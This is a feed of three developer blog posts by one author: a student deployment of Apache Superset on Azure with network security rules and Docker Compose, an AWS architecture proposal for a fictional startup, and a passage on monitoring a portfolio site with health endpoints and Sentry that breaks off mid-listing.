Forem: Luis Faria

Deploying Apache Superset on Azure From Scratch: My CCF501 Assessment 3

Luis Faria — Thu, 30 Apr 2026 07:11:17 +0000

Assessment 1 taught me how to reason about cloud architecture. Assessment 3 forced me to put one on the wire - and prove it works.

The Jump From Diagrams to Reality

A couple of weeks ago I wrote my Cloud Computing Fundamentals (CCF501) Assessment 1, a 1,500-word architecture proposal for a fictional startup, full of NIST characteristics and Mermaid diagrams (read: CCF501 Assessment 1 write-up).

Assessment 3 was different. The brief gave me four tasks: resource group, virtual network, firewall, application - and asked me to actually do them on a real cloud, with real screenshots, on a public IP. No more reasoning about Auto Scaling: provision the VM, open the port and make the application return a 200.

This article is the deployment story documenting what I built, why I picked an open-source tool nobody else in my cohort was deploying, and the security and governance choices I had to defend with evidence instead of paragraphs.

Deployment architecture — single Azure Resource Group containing the VNet, NSG, VM, and the Superset / Postgres / Redis Docker stack.

Course Context: CCF501 in 12 Weeks

I'm doing my Master's in Software Engineering & AI (open-sourced repo with +1000 commits in ~1 year of work) at Torrens University Australia. CCF501 - Cloud Computing Fundamentals is one of the two subjects in my current term (T1-2026). The 12-week ride covers ground in this order:

Traditional vs modern computing
Cloud essentials (NIST 5)
Deployment models (public / private / hybrid)
Service models (IaaS / PaaS / SaaS)
Major providers (AWS / Azure / GCP)
Advanced cloud concepts (XaaS, hands-on AWS/Azure lab)
Public/private/hybrid trade-offs
Deployment case studies
Governance and legal obligations
Cloud security threats
Security policy planning
Implementation of security policy at various providers

The assessments mirror that arc. Assessment 1 (week 4): a technology report on cloud's contribution to business automation; Assessment 2 (week 8): a case study comparing deployment models; Assessment 3 (week 12): build something. The whole subject converges on one question: can you actually deploy and secure a real application?

In parallel, I'm taking ISY503 Intelligent Systems, and the more I sit with that coursework, the more obvious it gets: an ML model on a laptop helps nobody: deployment is the work and CCF501 makes that real.

Why Apache Superset (The Off-List Bet)

The brief suggested apps like Moodle, ThingsBoard, KaaIOT, or Jira, but I didn't pick any of them.

I picked Apache Superset - an open-source data exploration and visualisation platform originally built at Airbnb, now an Apache top-level project. SQL Lab, 40+ chart types, dashboards, role-based access control, connectors for everything from PostgreSQL to BigQuery to Snowflake.

4 reasons it was the right call for me:

Python-native. Python is my primary stack. Reading the source, debugging containers, extending it later, all roads stay on familiar ground.
RBAC depth. Superset ships with 3 meaningful roles out of the box (Admin / Alpha / Gamma). The assessment rubric weights security and governance at 20%, and rich RBAC writes that section for you instead of forcing it.
Career fit. I work as a Data Analyst at a school in Sydney, building SQL pipelines and reports. Superset is the cloud-deployed version of that exact work, and it feeds directly into my T4 subject BDA601 Big Data & Analytics in T2-2026. The deployment becomes infrastructure for the next subject, not a throwaway.
Differentiation. Nobody else in the cohort is deploying Superset. Off-list choice → harder to defend → deeper learning → stronger portfolio piece.

I considered Metabase (simpler, faster) and MLflow (better long-term MLOps story). Both are legit. Superset won because the trade: slightly higher complexity for a richer governance story and a Python-aligned platform, was the one I wanted to make. See my brainstorm notes here.

The Architecture

The whole thing lives in a single Azure Resource Group (rg-superset-ccf501) in Australia East. One VNet, one subnet, one NSG, one VM. Superset, PostgreSQL 15, and Redis 7 run as 3 containers via Docker Compose on the VM.

VM size landed on Standard_B2als_v2 — the always-free B1s tier (1 vCPU, 1 GiB RAM) does not have enough memory to reliably run the full Superset + PostgreSQL + Redis stack.

I spun up the VM only when capturing evidence, then immediately stopped and deallocated it. According to the Azure Retail Prices API (checked 30 April 2026), the Standard_B2als_v2 in Australia East costs roughly US$0.0475 per hour (compute only).

Window	Rough compute cost
4 hours (one capture session)	~US$0.19
48 hours (two-day evidence window)	~US$2.28
730 hours (left running for a full month)	~US$34.68

This reinforced a key practical lesson: cloud resources are cheap when deliberately managed, and surprisingly expensive when forgotten.

Azure VM supersetluisccf501 — Ubuntu 22.04, Standard_B2als_v2, public IP attached, running state visible in the portal.

Why IaaS, Not PaaS?

I could have used Azure Container Instances, App Service for Containers, or AKS. I chose IaaS because the assessment was explicitly about provisioning a VM, VNet, firewall policy, and application stack. The trade-off was more operational responsibility, but more visibility into the cloud fundamentals the subject was assessing.

Option	Service model	What's managed for you	Why I didn't pick it (this assessment)
Azure Container Instances	Serverless containers	Hosts, OS, scaling	Hides the VNet/NSG/VM layer the rubric was testing
App Service for Containers	PaaS (managed runtime)	OS, runtime, TLS, autoscaling	Geared at single-container web apps; awkward for a 3-container Superset/Postgres/Redis stack
AKS	Managed Kubernetes	Control plane, node patching	Operational overkill for one short-lived demo
VM + Docker Compose (chosen)	IaaS	Hardware only	Forces every NIST and security decision into view

PaaS would have hidden the things CCF501 was teaching me to see. For real production work — long-running, multi-tenant, money on the line — App Service for Containers or AKS would be the better answer.

From-Scratch Deployment

I deployed Apache Superset 6.0.0 (the latest stable version at the start of the assessment in April 2026). The stack was pinned to this version for stability during evidence capture.

The 5 steps to get Superset running on Azure, with the security and governance layers in place:

Tip: As of April 2026, Azure is still offering a free tier with limited resources — enough for an evaluation VM, not enough to host the full Superset stack on the always-free B1s.

1. Provision Azure infrastructure

In the Azure portal:

Create resource group rg-superset-ccf501 in Australia East.
Add VNet vnet-superset (10.0.0.0/16) with subnet snet-app (10.0.1.0/24).
Attach NSG nsg-superset with three rules:

Priority	Name	Port	Source	Action
100	Allow-SSH	22	My IP / 32	Allow
110	Allow-Superset	8088	Any	Allow
65000	DenyAllInbound	*	*	Deny

Important note: In a production environment, never expose port 8088 to Any (0.0.0.0/0). For a real deployment I'd restrict this rule to a specific IP range, or — better — place an Azure Application Gateway or Front Door with WAF in front of the VM and remove the public IP from the Superset container entirely. This broad allow rule was used only because the deployment was extremely short-lived (demo data only, deallocated immediately after screenshots).

Launch a Linux VM (Standard_B2als_v2, Ubuntu 22.04 LTS) inside snet-app and attach a public IP.

Tip: The NSG rules are the first line of defence. Deny-all by default means every open port has to earn its place — SSH on 22 (locked to my single IP) and 8088 for Superset. Opening 8088 to Any on a public IP is not something I'd do for real data: it exposes the Superset login screen to the internet, and without TLS the credentials cross the wire in plaintext. This was only acceptable here because the VM was short-lived and served demo CSVs only. No port 80, no port 443; TLS is queued up for v2.

2. SSH in and install Docker

sudo apt update && sudo apt upgrade -y
sudo apt install -y docker.io docker-compose-plugin git
sudo usermod -aG docker $USER
newgrp docker

Tip: Docker encapsulates the application and its dependencies, so the same docker compose up works on Ubuntu, Amazon Linux, or a colleague's laptop. Reproducibility is the whole point.

3. Drop in the Docker Compose stack

A trimmed version of the working docker-compose.yml (real secrets pulled, replace with environment variables before you ever push this anywhere):

services:
  redis:
    image: redis:7-alpine
    networks: [superset-network]

  postgres:
    image: postgres:15-alpine
    environment:
      POSTGRES_DB: superset
      POSTGRES_USER: superset
      POSTGRES_PASSWORD: <db-password>
    volumes:
      - postgres-data:/var/lib/postgresql/data
    networks: [superset-network]

  superset:
    image: apache/superset:6.0.0
    depends_on: [postgres, redis]
    environment:
      SUPERSET_SECRET_KEY: <openssl-rand-base64-42>
      SUPERSET_METADATA_DB_URI: "postgresql+psycopg2://superset:<db-password>@postgres:5432/superset"
      REDIS_HOST: redis
      REDIS_PORT: "6379"
    ports: ["8088:8088"]
    volumes:
      - ./superset_home:/app/superset_home
      - ./config.py:/app/pythonpath/superset_config.py:ro
    networks: [superset-network]

volumes:
  redis-data:
  postgres-data:

networks:
  superset-network:
    driver: bridge

# config.py
import os

SECRET_KEY = os.environ["SUPERSET_SECRET_KEY"]
SQLALCHEMY_DATABASE_URI = os.environ["SUPERSET_METADATA_DB_URI"]

CACHE_CONFIG = {
    "CACHE_TYPE": "RedisCache",
    "CACHE_DEFAULT_TIMEOUT": 300,
    "CACHE_KEY_PREFIX": "superset_",
    "CACHE_REDIS_HOST": os.environ.get("REDIS_HOST", "redis"),
    "CACHE_REDIS_PORT": int(os.environ.get("REDIS_PORT", "6379")),
    "CACHE_REDIS_DB": 1,
}

DATA_CACHE_CONFIG = CACHE_CONFIG

The config.py mount wires Superset to use Redis as the cache backend and reads the Postgres URI from the environment. Generate the secret with openssl rand --base64 42 — never commit the real value.

Tip: depends_on makes the Superset container wait for Postgres and Redis. The ports line publishes 8088 from the container to the VM's public IP — the NSG rule from step 1 is what makes it actually reachable from a browser.

4. Bring it up and validate

docker compose up -d
docker compose logs -f superset   # wait for "Listening at: http://0.0.0.0:8088"
curl -I http://localhost:8088     # expect: HTTP/1.1 302 FOUND

Then in a browser, the Azure VM's public IP on port 8088 - http://<public-ip>:8088 - and the Superset login screen renders.

Apache Superset login page rendered through http://<public-ip>:8088 — proof the application is reachable end-to-end.

Tip: curl -I is the cheapest health check there is. A 302 FOUND is the right answer — Superset redirects unauthenticated requests to its login page.

5. Use the application

This is the step that turns "the server responded" into "the application works": upload three CSVs, build a real dashboard, and configure the three RBAC roles.

The sample datasets I used (data here):

cloud_costs_demo.csv — Azure cost by service / environment.
superset_usage_demo.csv — Superset activity by user role.
security_events_demo.csv — security events by control layer.

Three charts: a bar chart of Azure cost by service, a line chart of Superset usage by role over time, and a stacked bar of security events by control layer. Then create three users: admin (Admin), analyst (Alpha), viewer (Gamma), and confirm each one sees only what their role allows.

Working dashboard combining Azure cost by service, Superset usage by role, and security events by control layer — proof the app ingests data and renders charts, not just that the server returned 200.

Tip: This is where Superset's RBAC earns its keep. Admin sees everything. Alpha (analyst) creates and edits dashboards but can't manage users. Gamma (viewer) only sees what's been published.

Security and Governance: Defence in Layers

Cloud security is a stack of decisions, each one narrowing the attack surface a little more.

Network layer (NSG):

Deny-all default inbound. Two explicit allows: SSH on port 22 (source-restricted to my IP only) and Superset on port 8088. No port 80, no port 443, TLS is intentionally out of scope for v1, called out as an improvement (more below). The point is that every open port must have a reason.

OS layer:

SSH key-based authentication only. Password auth disabled in /etc/ssh/sshd_config. The IP allowlist on port 22 already limits exposure; key-only auth means even an exposed port won't fall to a brute-force.

Application layer (Superset RBAC):

Role	What they can do	Who gets it
Admin	Full control: users, databases, all dashboards	System administrator
Alpha	Create/edit own dashboards, run SQL Lab queries	Data analyst
Gamma	View dashboards only, no edit access	Business viewer

This is where Superset earns its keep over a simpler tool. The 20% governance criterion stops being theoretical when you can show three actual users, three actual permission sets, and three different views of the same dashboard.

Credential layer:

the Superset secret key, the Postgres password, and the admin password all live in environment variables, never hardcoded, never committed to the repo. The version of docker-compose.yml checked into the project uses placeholders.

Superset RBAC users page — three accounts (admin, analyst, viewer) bound to the three out-of-the-box roles, evidencing the governance layer.

The honest gap — and only acceptable for this context:

No TLS in v1. Opening 8088 to Any on a public IP is not something I would do for real data. It exposes the Superset login screen to the internet, and without TLS the login flow travels over plaintext HTTP. Superset can become a gateway to queryable datasets, so this was only acceptable here because the VM was short-lived, used demo CSVs, and was deallocated after evidence capture.

For anything touching real business or school data, the production-grade next step is mandatory: Azure Application Gateway or an nginx reverse proxy with Let's Encrypt for TLS, the public IP pulled in behind Front Door or a WAF, and the Superset container itself moved off a public-internet-exposed port — already called out explicitly in the report's robustness section.

Other production improvements queued up: Azure Database for PostgreSQL instead of a containerised Postgres (automated backups, HA), Celery workers off the Redis broker for long async queries (the Konquista pattern I built before with Django + Celery + Redis), Azure Monitor for alerts before the VM falls over.

AWS Portability Note

After the Azure deployment was finished, I ran the same stack on AWS (Amazon Web Services) EC2 / Amazon Linux 2023 to test how portable the architecture really was. Same VPC + Security Group + EC2 + Docker Compose pattern with the same three-container stack and the same RBAC.

Three things bit me on AWS that did not bite on Azure:

Amazon Linux 2023 is RPM-based, not Debian. apt update fails. Switch to dnf.
The Docker Compose plugin isn't bundled in the default docker package on AL2023, and there's no docker-compose-plugin in the AL2023 repo either. docker compose up returns "command not found." Install the official plugin into Docker's CLI plugins directory:

   sudo mkdir -p /usr/libexec/docker/cli-plugins
   sudo curl -SL "https://github.com/docker/compose/releases/latest/download/docker-compose-linux-x86_64" \
     -o /usr/libexec/docker/cli-plugins/docker-compose
   sudo chmod +x /usr/libexec/docker/cli-plugins/docker-compose
   docker compose version

University's ISP silently blocks outbound port 8088. The Security Group was open. Curl on the VM returned 302. The browser timed out. Fix: an SSH tunnel through port 22, which every network allows:

   ssh -i ~/Downloads/your-key.pem -L 8088:localhost:8088 ec2-user@<public-ip> -N

Then http://localhost:8088 in the browser. Port 22 carries it.

That third one cost an extra hour of debugging, and produced one of the term's most useful lessons. Azure is the main story. The AWS variant proves portability and logs the pitfalls — both implementations live in the repo.

docker ps on the Azure VM — Apache Superset, PostgreSQL 15, and Redis 7 all in Up state, the container-level proof that the Compose stack is healthy.

What This Term Taught Me

Three things I'm taking forward:

Architecture diagrams are useful, but deployment is honest. Cloud theory let me draw a clean architecture in Mermaid. Deployment exposed the trade-offs that don't show up in a diagram, VM RAM ceilings, Compose plugin differences across distros, ISPs that filter non-standard ports, the gap between "the server is up" and "the application is usable."

Tip: Mermaid Live Editor is the open-source tool I used for every diagram in this article — flowcharts, sequence diagrams, the lot. The syntax is plain text, and the output drops straight into Markdown.

Cloud security is layered, not bolted on. Network, OS, application, credentials — each one is a decision. Skip any layer and the attack surface widens. The exercise of justifying every open port has been more useful than memorising the OWASP Top 10.
Open-source analytics tools are excellent portfolio projects. They sit at the intersection of infrastructure (deployment), data (connections, datasets), security (RBAC), and usability (dashboards that real people read). One project, four learning surfaces.

And a practical one: stop and deallocate cloud resources the moment you finish capturing evidence. Free credits run out faster than you expect when you forget that a B2als_v2 VM is metered by the second.

Building in Public

Studying for a Master's while working a 9-5 job means assignments stop being abstract: the same patterns - IaaS, NSGs, RBAC, deny-by-default firewalls, env-var secrets - show up at work the same week I learn them. I'm sharing this publicly because the learning compounds when it's open.

Assessment Brief - CCF501 Assessment 3
Deployment notes + technical artifacts
AWS variant - pitfall log included
CCF501 Assessment 1 article - the architecture-design predecessor to this one
Assessment 1 submission
Assessment 2 submission
Assessment 3 submission covering the case in granular detail.

If you're deploying something open-source on a cloud provider for the first time, what surprised you most: the infrastructure, the security choices, or the network getting in your way?

Let's Connect

LinkedIn: linkedin.com/in/lfariabr
GitHub: github.com/lfariabr
Portfolio: luisfaria.dev

References

Apache Software Foundation. (n.d.). Apache Superset documentation. https://superset.apache.org/docs/intro

IBM. (n.d.). SaaS, PaaS, IaaS explained. https://www.ibm.com/think/topics/iaas-paas-saas

Mell, P., & Grance, T. (2011). The NIST definition of cloud computing (Special Publication 800-145). National Institute of Standards and Technology. https://doi.org/10.6028/NIST.SP.800-145

Microsoft. (n.d.-a). Azure Virtual Network documentation. Microsoft Learn. https://learn.microsoft.com/en-us/azure/virtual-network/

Microsoft. (n.d.-b). Network security groups overview. Microsoft Learn. https://learn.microsoft.com/en-us/azure/virtual-network/network-security-groups-overview

Microsoft. (n.d.-c). Create your Azure free account today. https://azure.microsoft.com/en-au/free/

Sandhu, R. S., Coyne, E. J., Feinstein, H. L., & Youman, C. E. (1996). Role-based access control models. Computer, 29(2), 38–47. https://doi.org/10.1109/2.485845

Designing a Cloud Architecture from Scratch: My CCF501 Assessment 1

Luis Faria — Mon, 16 Mar 2026 00:38:15 +0000

AWS gives you 200+ services. My Masters assignment asked me to pick the right ones - and justify every decision.

The Challenge

This term I'm studying Cloud Computing Fundamentals (CCF501) at Torrens University Australia. Assessment 1 was a design challenge: propose a secure, scalable cloud architecture for ABC Enterprises - a fictional delivery and payments startup modernising its entire IT infrastructure.

The case study numbers set the stakes:

~80% reduction in start-up IT costs after moving to cloud
10x customer surge absorbed in a single month, with no additional headcount

No recipe given. Just requirements, a blank canvas, and a word count.

This article is the full breakdown behind the LinkedIn post I shared - the reasoning, the trade-offs, and what the exercise actually taught me.

Why Cloud? (And Why Not On-Premises)

Traditional IT means owning servers, cooling, and the staff to keep it all running. For a high-growth startup like ABC, that model is a strategic liability. You buy capacity for a projected peak, sit on idle hardware during troughs, and wait weeks for procurement when demand surges beyond forecast.

Cloud flips the model: rent capability, not hardware. The NIST definition nails it with five characteristics:

NIST Characteristic	What It Means for ABC
On-Demand Self-Service	Dev team spins up EC2 and RDS via console - no vendor call required
Broad Network Access	App accessible via mobile and browser across delivery, taxi, and payments verticals
Resource Pooling	ABC shares AWS physical hardware; workloads logically isolated per tenant via VPC
Rapid Elasticity	10x surge absorbed automatically - no procurement delay, no manual intervention
Measured Service	~80% reduction in start-up IT costs - pay only for compute-hours and GB-months consumed

Three Benefits That Mattered for ABC

1. Cost Efficiency: CAPEX to OPEX

Cloud shifts spend from capital expenditure (hardware you buy) to operational expenditure (capacity you consume). The ~80% reduction in start-up IT costs is the measured service characteristic in action. As workloads grow, standard operations - backups, patching, scaling - get codified and automated, reducing human toil across the pipeline.

2. Rapid Scalability Without Procurement

A 10x customer surge in a single month exposes the core weakness of on-premises: procurement lead times mean hardware arrives after the opportunity has passed. EC2 Auto Scaling provisions or terminates instances based on CloudWatch signals - capacity becomes policy-driven, not operator-driven.

3. Reduced IT Management Overhead

In on-premises environments, more customers means more infrastructure and more staff to maintain it. Cloud breaks that linear relationship. Through resource pooling, providers consolidate physical resources across tenants, letting ABC gain resilient architectures that would be expensive to replicate in-house.

The Architecture

I chose AWS - partly because Route 53 was already in the described stack, and partly because the managed-service breadth made every design decision straightforward to defend.

Here's how the stack layers together:

Route 53: DNS layer, the front door. Handles routing and health checks at the DNS level.
Elastic Load Balancer (ELB): distributes inbound traffic across EC2 instances, runs health checks before requests hit compute, integrates natively with Auto Scaling.
EC2 + Auto Scaling: horizontally scalable compute. Provisions or terminates instances on demand signals. Absorbed the 10x surge with zero manual intervention.
S3: object storage for assets, backups, and static content. Pay-per-GB, no provisioned minimum, practically unlimited ceiling.
RDS: managed relational database (PostgreSQL). Removes operational overhead of running your own DB server. Multi-AZ for resilience, read replicas on demand.
Lambda: event-driven compute for workflow automation: order placed → delivery assigned; payment confirmed → restaurant notified. Scales to zero when idle, charges only per invocation.

The traffic flow looks like this:

And the high-level architecture:

The Three Challenges (and How to Mitigate Them)

Cloud adoption is not risk-free. Three challenges are most relevant for ABC:

1. Security and Privacy

ABC handles payments and customer PII. Security is the top concern for cloud adopters - 90% of security professionals cite it as a challenge. Mitigation isn't a single switch; it's a cascade:

IAM least-privilege policies - nothing gets more access than it needs
Mandatory MFA on all console and API access
Encryption at rest and in transit across S3, RDS, and Lambda
Security groups on EC2 as a network firewall layer
AWS WAF + Shield Standard at the perimeter

The shared responsibility model is the mental model here: AWS secures the infrastructure, ABC secures what runs on it.

2. Cost Volatility

Pay-as-you-go can spiral without guardrails - overprovisioned instances and excessive egress generate surprise bills. Mitigation: FinOps habits from day one. Budget alerts, resource tagging, rightsizing, and reserved pricing for stable workloads.

3. Vendor Lock-in and Skills Gap

Deeper managed-service adoption makes provider migration expensive. Mitigation: prioritize portability (containers, standard databases) and invest in targeted upskilling. The skills gap is a real cost that rarely appears in TCO calculations.

Deployment and Service Model

Why Public Cloud

Deployment Model	Cost	Elasticity	ABC Fit
Public Cloud	Low - OPEX only	High - Auto Scaling	✅ Recommended
Private Cloud	High - CAPEX + ops staff	Limited - fixed capacity	❌ Over-engineered for a startup
Hybrid Cloud	Medium - dual infrastructure	Moderate - complex to manage	⚠️ Premature for current maturity

Public cloud is the clear fit. IBM reports IaaS workloads experience 60% fewer security incidents than traditional data centres - so "private = more secure" is a myth worth dispelling.

Why IaaS + PaaS (Not SaaS)

Cloud service models sit on a control-versus-responsibility spectrum. IaaS gives compute flexibility. PaaS abstracts infrastructure so the team can focus on development. SaaS offers limited customisation - less suited to a startup that must differentiate its platform.

Recommendation: Blend IaaS (EC2 for compute flexibility) with PaaS (RDS and Lambda as managed services). Add a VPC for network isolation as the platform matures.

Cost Model

Three levers exist:

Pay-as-you-go: maximum flexibility, highest unit price
Reserved/committed pricing: discounts of 30–60% for baseline commitments
Spot/preemptible: deep discounts for interruption-tolerant workloads

Recommendation: A hybrid cost model - reserved capacity for stable customer-facing tiers (web/app, databases), pay-as-you-go autoscaling for demand spikes, and spot instances for background jobs and analytics pipelines.

Cloud adoption is rarely about the cheapest bill. It's about better ROI: less downtime, faster launches, and automation that avoids linear headcount growth.

Why AWS Over Azure or GCP

Provider	Ecosystem Fit	Load Balancing	Serverless	ABC Alignment
AWS	Broadest managed-service catalogue	ELB - native Route 53 integration	Lambda - event-driven, zero idle cost	✅ Best fit - Route 53 already in stack
Azure	Microsoft / enterprise-aligned	Application Gateway - extra config	Azure Functions - separate ecosystem	⚠️ No Microsoft signals in ABC
GCP	Analytics and ML-first	Cloud Load Balancing - GKE-oriented	Cloud Run / Functions - container-first	❌ No analytics-heavy workloads yet

The Route 53 signal was decisive. It's not just familiarity - it means the DNS and load balancing layers integrate natively, reducing configuration surface area and failure points.

What the Exercise Actually Taught Me

The biggest insight wasn't choosing between AWS services. It was understanding why you layer them the way you do.

Security is not a layer you add at the end. It lives at every tier:

DNS filtering at Route 53
Traffic rules at the load balancer
Security groups on EC2
IAM policies on S3 and Lambda
Encryption at the data layer

Similarly, scalability isn't one Auto Scaling policy. It's a cascade: DNS health checks → load balancer distribution → compute elasticity → database read replicas. Each layer has to be designed to hand off load gracefully to the next.

The other thing I'll carry forward: reserved instances vs on-demand pricing is an architectural decision, not just a finance conversation. What you commit to reserved shapes what you build around it.

Full Services Provisioned

AWS Service	Role	Baseline Config	Scale Ceiling
EC2 (web/app tier)	Serve API requests	2× t3.medium	20× c5.xlarge
Auto Scaling	Scale EC2 fleet on demand	Policy-driven (CloudWatch)	Absorbed 10x surge, zero manual intervention
ELB	Distribute inbound traffic	Always-on	Scales transparently
RDS (PostgreSQL)	Structured data: orders, rides, payments	db.r5.large, Multi-AZ	Read replicas on demand
S3	Receipts, media assets, backups	Pay-per-GB	Unlimited
Lambda	Event-driven workflows	128 MB / 3s timeout	1,000 concurrent (raisable)
Route 53	DNS routing and health checks	Always-on, per-query billing	Globally redundant
VPC	Network isolation	Single VPC, subnet per tier	Peering + private endpoints as needed
CloudFront	CDN - static asset delivery	Global edge	Scales to any volume
CloudWatch	Monitoring and autoscale triggers	Always-on	15 months metric retention
AWS WAF + Shield	DDoS mitigation, traffic filtering	Shield Standard (free)	Shield Advanced available

Building in Public

Studying for a Masters while working full-time means assignments like this don't stay abstract. The same patterns - load balancing, autoscaling, IAM, cost modelling - appear in the systems I work with every week.

I'm sharing the architecture diagrams, the reasoning, and the assessments publicly because the learning compounds when it's in the open.

📋 Assessment Brief - CCF501 Assessment 1
📄 My Report - Technology Report and Presentation
🖥️ My Presentation Slides

If you're designing cloud architectures - or just starting to think about them - what pattern challenged your assumptions the most?

Let's Connect

LinkedIn: linkedin.com/in/lfariabr
GitHub: github.com/lfariabr
Portfolio: luisfaria.dev

References

Amazon Web Services. (n.d.-a). AWS Well-Architected Framework. https://aws.amazon.com/architecture/well-architected/

Amazon Web Services. (n.d.-b). AWS Pricing. https://aws.amazon.com/pricing/

Bittok, T. (2022). Cloud total cost of ownership. LinkedIn Pulse. https://www.linkedin.com/pulse/cloud-total-cost-ownership-theophilus-bittok-/

Eliaçık, E. (2022). Pros and cons of cloud computing. Dataconomy. https://dataconomy.com/2022/05/pros-and-cons-of-cloud-computing-2022/

IBM. (n.d.-b). What is a public cloud? IBM. https://www.ibm.com/think/topics/public-cloud

McHaney, R. (2021). Cloud technologies: An overview of cloud computing technologies for managers. Wiley.

Mell, P., & Grance, T. (2011). The NIST definition of cloud computing (Special Publication 800-145). NIST. https://doi.org/10.6028/NIST.SP.800-145

Production Observability for $0: How I Monitor My Portfolio with Sentry + Pulsetic

Luis Faria — Mon, 02 Mar 2026 04:24:30 +0000

I got my first Sentry weekly report. 23 errors. 1.7k transactions. On a side project. That's what production observability looks like — and it costs $0.

The Email That Made It Real

A few weeks after shipping the monitoring stack, the email landed:

I read it twice. Not because something was on fire — but because this is what production engineers actually see (or should) every Monday morning. Error counts. Transaction volume. Trends. I was flying blind before this. Not anymore.

On this post, I'm sharing details of how I built a 4-layer observability stack on my portfolio (luisfaria.dev) - open source, free tier, real production data.

The Problem: Shipping Blind

My previous dev.to article (From git pull to GitOps) ended with this honest admission in the "Future Roadmap" section:

"Monitoring & Alerting: Sentry for error tracking, uptime monitoring, and resource alerts. Current health checks cover the basics, but production-grade observability is the next evolution."

Once the CI/CD pipeline was working — tests passing, Docker images building, Discord pings on deploy — I had a new problem. I had no idea what was happening after the deploy.

Was the site up? Were there errors? Were users hitting rate limits? Was the server about to OOM?

I didn't know. So I fixed it.

The Architecture: 4 Layers

                ┌─────────────────────────────────┐
                │   External Uptime Monitor       │
                │   (Pulsetic)                    │
                │   Pings /health/ready every 60s │
                └────────────┬────────────────────┘
                             │ HTTPS
                ┌────────────▼────────────────────┐
                │   Nginx (reverse proxy)         │
                │   Port 80/443                   │
                └────────────┬────────────────────┘
                             │
          ┌──────────────────┼──────────────────┐
          │                  │                  │
┌─────────▼───────┐  ┌──────▼──────────┐  ┌─────▼───────┐
│  Frontend       │  │  Backend API    │  │  MongoDB    │
│  (Next.js)      │  │  (Express)      │  │  + Redis    │
│  @sentry/nextjs │  │  @sentry/node   │  │             │
└────────┬────────┘  └──────┬──────────┘  └─────────────┘
         │                   │
         └─────────┬─────────┘
                   │
          ┌────────▼────────┐
          │   Sentry.io     │
          │   Error Tracking│
          └─────────────────┘

┌─────────────────────────────────┐
│  Cron (every 5 min)             │
│  monitor-resources.sh           │
│  CPU / Memory / Disk / Docker   │
│  → Discord Webhook              │
│  (deduplicated, 30-min cooldown)│
└─────────────────────────────────┘

Each layer covers a different failure mode:

Layer	What it catches	Latency
Health endpoints	Is the process running? DB/Redis connected?	Instant
Sentry	Code errors, crashes, slow transactions	< 1 min
Pulsetic	External view — is the site reachable?	< 2 min
Cron script	CPU/Mem/Disk/Docker going wrong	< 5 min

Layer 1: Tiered Health Endpoints

Before wiring up external monitors, I needed something for them to ping. I built three tiers — each with a different audience and a different level of detail.

// backend/src/routes/health.ts

// Liveness probe — "is the process running?"
// Always 200. Load balancers use this.
router.get('/health', (_req, res) => {
  res.status(200).json({ status: 'ok' });
});

// Readiness probe — "can it serve traffic?"
// 200 when healthy, 503 when degraded.
// Pulsetic targets this endpoint.
router.get('/health/ready', async (_req, res) => {
  const { healthy, checks } = await runChecks();

  // Strip latencies — no sensitive details for public consumers
  const coarseChecks: Record<string, { status: string }> = {};
  for (const [key, val] of Object.entries(checks)) {
    coarseChecks[key] = { status: val.status };
  }

  res.status(healthy ? 200 : 503).json({
    status: healthy ? 'ok' : 'degraded',
    timestamp: new Date().toISOString(),
    checks: coarseChecks,
  });
});

// Internal diagnostics — full checks + system info
// IP-whitelisted: loopback, Docker bridge, 10.x private networks only.
// CI pipeline uses this from inside the Docker network.
router.get('/health/details', async (req, res) => {
  if (!isTrusted(req)) {
    res.status(403).json({ error: 'Forbidden' });
    return;
  }

  const { healthy, checks } = await runChecks();
  const system = getSystemInfo();

  res.status(healthy ? 200 : 503).json({
    status: healthy ? 'ok' : 'degraded',
    timestamp: new Date().toISOString(),
    checks,   // includes latencies
    system,   // includes memoryUsage, loadAvg, cpus, uptime, nodeVersion
  });
});

The IP guard for /health/details is worth calling out:

const TRUSTED_EXACT = new Set(['127.0.0.1', '::1', '::ffff:127.0.0.1']);
const TRUSTED_PREFIXES = [
  '10.',
  ...Array.from({ length: 16 }, (_, i) => `172.${16 + i}.`),
  // Docker bridge ranges: 172.17.x through 172.31.x
];

function isTrusted(req: Request): boolean {
  const ip = req.ip || req.socket?.remoteAddress || '';
  if (TRUSTED_EXACT.has(ip)) return true;
  return TRUSTED_PREFIXES.some((prefix) => ip.startsWith(prefix));
}

Calling it from the public internet returns 403 Forbidden. From inside Docker (CI pipeline) it returns the full diagnostics JSON.

Layer 2: Sentry — Error Tracking for Both Services

The Backend Setup (`@sentry/node`)

The critical thing: Sentry must be the very first import in backend/src/index.ts. Before Express, before Apollo, before anything.

// backend/src/instrument.ts
import * as Sentry from '@sentry/node';
import type { EventHint } from '@sentry/node';
import { GraphQLError } from 'graphql';

const AUTH_CODES = new Set(['UNAUTHENTICATED', 'FORBIDDEN', 'BAD_USER_INPUT']);

if (process.env.SENTRY_DSN) {
  Sentry.init({
    dsn: process.env.SENTRY_DSN,
    environment: process.env.NODE_ENV,
    tracesSampleRate: process.env.NODE_ENV === 'production' ? 0.2 : 1.0,

    beforeSend(event, hint: EventHint) {
      // Skip HTTP 401/403 — auth flow, not bugs
      const statusCode = event.contexts?.response?.status_code;
      if (statusCode === 401 || statusCode === 403) return null;

      // Skip GraphQL auth/validation errors
      const original = hint.originalException;
      if (original instanceof GraphQLError) {
        const code = original.extensions?.code;
        if (typeof code === 'string' && AUTH_CODES.has(code)) return null;
      }

      return event;
    },

    initialScope: { tags: { service: 'portfolio-api' } },
  });
}

The beforeSend filter is important. Without it, every unauthenticated API request fires a Sentry event. That's noise, not signal — so I filter out UNAUTHENTICATED, FORBIDDEN, BAD_USER_INPUT, and HTTP 401/403.

For GraphQL specifically, I added an Apollo plugin that captures non-auth errors:

// In Apollo Server setup (backend/src/index.ts)
plugins: [
  {
    async requestDidStart() {
      return {
        async didEncounterErrors({ errors }) {
          for (const err of errors) {
            const code = err.extensions?.code as string | undefined;
            if (!AUTH_CODES.has(code ?? '')) {
              Sentry.captureException(err);
            }
          }
        },
      };
    },
  },
],

The Frontend Gotcha: `instrumentation.ts`

This is the part that trips up almost everyone on Next.js 13+. It gave me more work than expected. You can install @sentry/nextjs, add sentry.client.config.ts, wrap your config with withSentryConfig() - and still get zero frontend errors in Sentry.

The missing piece: frontend/src/instrumentation.ts.

// frontend/src/instrumentation.ts
export async function register() {
  if (process.env.NEXT_RUNTIME === 'nodejs') {
    await import('../sentry.server.config');
  }

  if (process.env.NEXT_RUNTIME === 'edge') {
    await import('../sentry.edge.config');
  }
}

This file is Next.js's official hook for initializing server-side code. Without it, Sentry's server/edge SDK never initializes, so SSR errors and API route errors silently vanish.

You need three Sentry config files at the frontend root:

frontend/
